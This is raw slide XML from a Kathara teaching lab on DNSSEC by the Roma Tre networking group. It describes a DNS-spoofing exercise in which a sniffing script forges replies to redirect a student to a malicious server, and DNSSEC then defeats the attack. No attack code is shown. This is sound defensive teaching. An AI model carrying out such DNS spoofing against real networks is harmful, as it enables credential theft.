              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D336C1D3-4F53-106C-FD47-C7E6E7FF5211}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30ABB985-7980-A9C1-7E23-09C3AEE5E14F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A382EF47-9037-6342-13FD-DBFD78BE8693}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70CDD81C-CE59-85E5-8A32-6638A505A6FB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95CC365B-7988-E017-AA24-F88407506037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view hacker database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3FD8D6E-DA69-76A7-91A1-CB2E2BD1D742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59E03884-897D-FD09-C10E-1E877E519FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04EBFB9-1664-ED5D-AB6D-A37BB74D6FC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6434123"/>
            <a:ext cx="181822" cy="371513"/>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endParaRPr lang="en-US" sz="1800" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F485CAD-2EC6-59EC-3BCF-C8DD83DA15D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7148945" y="4314433"/>
            <a:ext cx="4055062" cy="1088840"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -92427"/>
              <a:gd name="adj2" fmla="val -99619"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>evil's database is empty, DNSSEC worked. The student's credentials were not stolen by the hacker.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330632988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0DF947-D7E3-00CD-1438-FDEFB35207A3}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F69E57E8-76CB-9CA2-D6C2-E7573B3CF4F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>lab configuration with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and redundancy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{386E6019-AF88-C1E8-B036-4063791F1B65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75196423-CAB6-03C0-5686-B3E67A8C0F0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6708A1E5-AE3C-4DFF-C197-98528EC9AB12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393103811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97A6A7-9F9F-CFFF-2841-8FEB1152362C}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8197" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD4A1361-28E2-C653-64D7-96590385430D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>content of the lab with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and redundancy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8198" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4628F309-7D17-322B-9EC8-8E55AF463A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>There are three routers, called r1 , r2 and r3 , there are four hosts, called pc1, pc2, pc3 and pc4, and three DNS levels, called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dnsroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dnsit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dnsuni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. The root node has a backup machine called dnsroot2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>they are connected via  three LANs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>we force their MAC addresses to be easily readable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>we will learn how to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>iptables command to block traffic for DNS resolution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>script to sniff traffic and create fake packet to redirect traffic to malicious web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DNS response validation with DNSSEC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A558B22F-7415-3F1E-7D1D-0AB2295603AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08AAE86E-B0F5-FB08-52AF-38160823A859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8199" name="Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA06A0F6-44D0-A8C2-990A-D182E8B3C4B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9332918" y="5"/>
            <a:ext cx="1716087" cy="333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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© Computer Networks Research Group Roma Tre</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1797619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2530F8-8F63-B0A3-C27E-483F254F31F4}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6027E26-B683-CFEE-CD6C-D5C9F6F5FCE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D37430EF-26CB-A2CC-931E-803FDB6C37C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F09ADF4-7678-B090-B580-4B7EBA539554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
